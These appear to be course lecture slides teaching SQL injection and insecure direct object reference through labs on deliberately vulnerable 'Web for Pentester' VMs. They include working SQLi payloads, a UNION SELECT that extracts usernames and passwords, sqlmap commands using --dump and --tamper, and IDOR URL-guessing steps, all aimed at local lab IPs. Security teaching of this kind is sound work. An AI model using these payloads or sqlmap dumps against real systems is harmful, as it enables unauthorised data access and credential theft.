Expose Website

Security Vulnerabilities
SQLMAP, IDOR
SQLi recap

 Now we know: not as easy as it sounds!

 It gets easier with practice – commit to at least two short practice sessions this week
 What tools do we have in our toolbox? (“SQLi payloads”)
 AND/OR e.g. 1=1 or ‘1’=‘1’
 Comments (What 3 styles do we know?)
 select * from ABC …UNION select * from CredentialsTable
 URL encoding: is ‘space’ is forbidden? Try %20. tab = %09. Newline = %0D. Hash # =%23
 Where can we apply our payloads?
 In any vulnerable input field
 It’s easy in-browser: www.fakefacebook.com/login?user=jeff&pass=‘ OR 1=1
 A bit harder: USER-AGENT=SELECT * FROM CredentialsTable
 What software have we used that manipulates HTTP packets?
 Where else could we try to inject commands?
Insecure Direct Object Reference

 Review AAA:
 What does Authentication mean?
 What does Authorisation mean?
 What does Accounting mean?
 Who are you? Can you do that? How much did you use? (billing/auditing)
 Power company emailed you – your bill is ready:
http://www.powerRus.com.au/bills/bill.php?bill_id=12345
 Have you ever tried changing 12345 to 12346?
 Did it work?
 If it did and you just saw someone else’s bill:
 Insecure Direct Object Reference
 Which AAA principle wasn’t followed?
Sounds too easy. Must not be
common, right?

 https://nakedsecurity.sophos.com/2017/01/26/how-one-man-could-have-deleted-
any-public-facebook-video/
 Facebook fixed the vulnerability in July and awarded Melamed a $10,000 bug bounty
How can we exploit IDOR?

 Download Web for Pentester 2 and create a VM (VMNet: NAT, RAM=1GB)

 Start your VM, get the IP address. On your host, browse to the IP
 Open Authorisation, Exercise 1 and 2
 Document Management System
 Logging off should stop you from accessing any document
 You should only be allowed to see your own documents
 Try exercise 1-3
 Exercise 3 is harder
Pentester II: Authorisation Lab 1-3
30 minutes

 Proper operation: Log in, you can

only see your docs.
Log off and you lose access.
 Improper operation: Can I access someone else’s docs?
Can I still access documents after I log off?

 Hint: look at the URL bar when you log in and

click on a document. What changes between
Confidential document #1 and Confidential document #2?

 Too easy? Instead of modifying the URL in your browser, try using
BurpSuite and intercept the packet.
Exercise 1

 I logged in and found a document

 http://192.168.2.143/authorization/example1/infos/2
(Copy this into notepad – we’ll try this later..)
 Log out: should I still have access?

 What happens if I type the address in manually?

 I’m logged out: I should have *no* access to documents
 System is not validating we are authorised – it just trusts the URL we type
Exercise 2
 Try the same trick again – can I access document while logged out?
 nope, if I log out, I lose all access (back to login page – authorisation check)
 Log in as User1 and open the document. Look at the URLs:
 Document 1: http://192.168.2.143/authorization/example2/infos/1
 Document 2: http://192.168.2.143/authorization/example2/infos/2
 What’s the URL for #3? Try http://192.168.2.143/authorization/example2/infos/3
 Document #1: user1’s doc (my account) Document #3: user2? Jackpot!
Exercise 3

 New feature in website – Edit

 What do edit URLs look like:
 http://192.168.2.143/authorization/example3/infos/edit/1
 http://192.168.2.143/authorization/example3/infos/edit/2
 What about #3?
 http://192.168.2.143/authorization/example3/infos/edit/3
Other popular IDOR

 http://www.cvedetails.com/google-search-
results.php?q=direct+object+reference
 5 minutes: who can find
the most popular/
worst sounding
IDOR vulnerability?
SQLi Review – 15 minutes

1. Recall: if I’m logging in, what might the SQL look like?
SELECT password FROM logins WHERE user=‘test’
2. Try to locate where you can inject:
SELECT password FROM logins WHERE user=‘______’
3. Try injecting some SQL:
SELECT password FROM logins WHERE user=‘ ‘ OR ‘1’=‘1 ’
 Can you still remember how to inject SQL commands? Reminders:
 Lab #1: – replace ‘..name=root’ in URL with your correctly formatted command
 #2: and #3: spaces are filtered, what else could we use?
 #4: Now, we need to inject into the id field instead.
 #5: Our ID parameter must start with a number
 #6: Our ID parameter must end with a number
 Optional/Advanced:
#7: start and end with a number, #8: Time-based attack #9: ORDER BY injection
SQLMap

 Tool for automating the detection/exploitation of SQL injection vulnerabilities

 Python based
 It is not as smart as you!
 But great for automating / finding the easy stuff
 SQLMap needs a URL that it can examine for injection:
 e.g. http://www.website.com/login?user=johndoe
 Try running against your Web for Pentester 1 VM
 SQL Injection Exercise 1 URL: http://192.168.2.141/sqli/example1.php?name=root
Copyright GBHackers
https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/
SQLMap

 Try it yourself:
sqlmap -u http://<WebForPentesterTarget_IP>/sqli/example1.php?name=root
 You will be asked some questions:

 What do you think these messages mean?

 Risk = could this break things? (i.e. accidentally update all entries in table)
 Level = do I only use common payloads (e.g. 1=1) or use really rare ones too? (slow)
 Start with defaults (risk=1, level=1). Maximums are risk=5, level=3 but can be dangerous
 What about the second message (keep testing for other parameters)
SQLMap Result Initial tests
sqlmap -u
http://1.1.1.1/sqli/
example1.php?name=root

Found an injection point: name

parameter isn’t being
checked/filtered

Injection successful – save our work

(i.e. remember how we did this so we can
skip the detection stuff next time)
 Now try: cd /root/.sqlmap/output/192.168.2.141/dump/exercises
cat users.csv
 What do you see?
SQLMap didn’t work!

 Try using some parameters to change sqlmap’s behaviour:

--dbms=mysql # Let’s assume the database is mysql
--tamper=space2comment # Server is filtering spaces; swap for comments like /**/ instead
 What else can we try?
 Level and Risk
 Anything else??
 Give SQLMap a hint/head start. * means “try injecting commands here:”
SQLMap example – exercise 7

 SQLMap fails on exercise 7 – filters are too good.

 Exercise 5 and 6 forced the input to either
begin or end with a number (regular expression)
(e.g. injecting 1=1# won’t work since it doesn’t
end with a number)
 For exercise 7, what if we tried:
1=1<newline>
UNION SELECT 1,2,3,4,5, FROM … where 1=1
 It starts with a number and it ends with a number
 This should work:
http://192.168.2.141/sqli/example7.php?id=1%0A UNION
SELECT name,passwd,3,4,5 FROM users WHERE 9=9
SQLMap example – exercise 7
 Now tell SQL map where to inject with the * character:
sqlmap -u http://192.168.2.141/sqli/example7.php?id=2%0A* --dump
 i.e. after the newline (%0A), try a number of SQL payloads

Not looking
good..

Spoke too soon

Success!
Database
dumped.
Exercise

 Try SQLMap on all SQLi exercises (even 8 and 9)

 Remember to --purge-output after each success
 Most of the time, it works
 Can you use –dbms, --tamper, and * to make SQLMap work?